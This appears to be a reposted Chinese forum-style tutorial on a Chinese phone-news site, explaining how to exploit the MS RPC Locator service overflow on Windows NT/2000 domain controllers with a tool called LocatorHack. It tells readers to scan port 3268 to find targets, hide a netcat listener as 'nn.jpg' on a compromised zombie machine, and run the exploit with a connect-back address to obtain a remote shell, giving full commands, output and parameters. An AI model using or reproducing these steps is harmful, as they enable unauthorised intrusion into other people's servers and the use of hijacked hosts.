首页 / 趣闻 / rpc漏洞的利用

rpc漏洞的利用

sunx出的那个程序成功率还不错 
没用过的去sunx.org下载吧 
简要说一下用法(给没用过的看的) 
首先拿superscan去扫3268端口,因为这是域控制器的标志 
这个漏洞只对域控制器有效 
扫到这样的机器以后,用nc在本地监听一个端口 
我是内网,只好在肉鸡上监听了 
下面是在肉鸡上~nn.jpg就是我放上去的nc 
218.0.0.0代表目标机 
123.123.123.123 代表开nc监听的肉鸡 
————– 
D:\WINNT\system32>nn.jpg -l -p 1111 
nn.jpg -l -p 1111 
—————~~ 
然后在本地(ip不能说啊)参数大家自己查吧 
————— 
C:\>LocatorHack -h 218.0.0.0 -v 2 -l 2 -s 3 -r 123.123.123.123 -p 1111 
MsRpcLocator formQueryPacket.wcscpy overflow. writen by sunx 
http://www.sunx.org 
for test only, dont used to hack,  

connect socket…. 
connect smb… 
open namedpipe… 
bind rpc… 
call rpc… 
Overflowed, 218.0.0.0:1111 ——???是不是弄错? 
good luck  
—————— 
这时候肉鸡上就出现了对方的system32目录 
usage: LocatorHack <-h Host> <-v OSVer> <-l OSLanguage> <-s OSSP> <-r connectback host> <-p connectback port> 

OS Version: 
winnt: 1 
win2k: 2 
winxp: 3 
OS Language: 
english: 1 
chinese: 2 
japanese: 3 


Exp: LocatorHack -h 192.168.0.1 -v 3 -l 1 -s 0 -r 127.0.0.1 -p 99 

-h 目标主机 
-v OS Version 2000就选2 
-l OS Language 按照上面的选择 
-s 选择所打的补丁 
-r 开nc的主机,可以是你自己也可以放在肉鸡上 
-p 用nc开的端口 
Locator Service是指向网络特有的名称映射逻辑名称的服务。此次就是在Locator Service中发现安全漏洞的。 Locator Service被捆绑于Window NT 4.0、Windows 2000和Windows XP中。不过,只有被设置成主域控制器的Windows NT 4.0和2000中,在默认条件下Locator Service才是有效的。没有设置成主域控制器的Windows NT/2000及XP则是无效的。 用superscan扫3268吧,很快就能扫到. 

本文来自网络,不代表155手机网立场,转载请注明出处:https://www.155shouji.com/html/happy/2019/1125/128076.html

dawei作者

【声明】:155手机网内容转载自互联网,其相关言论仅代表作者个人观点绝非权威,不代表本站立场。如您发现内容存在版权问题,请提交相关链接至邮箱:bqsm@foxmail.com,我们将及时予以处理。
上一篇
下一篇

为您推荐

联系我们

联系我们

0577-28828765

在线咨询: QQ交谈

邮箱: xwei067@foxmail.com

工作时间:周一至周五,9:00-17:30,节假日休息
返回顶部

本站内容转载自互联网,其发布内容言论不代表本站观点,如果其链接、内容的侵犯您的权益,烦请提交相关信息发邮件至xwei067@foxmail.com我们将及时予以处理。

建议您使用1366×768 分辨率、Microsoft Internet Explorer 11浏览器以获得本站的优质浏览效果

Copygight © 2017-2023 https://www.155shouji.com All Rights Reserved. 155手机网

站长:xwei067#foxmail.com(请把#换成@)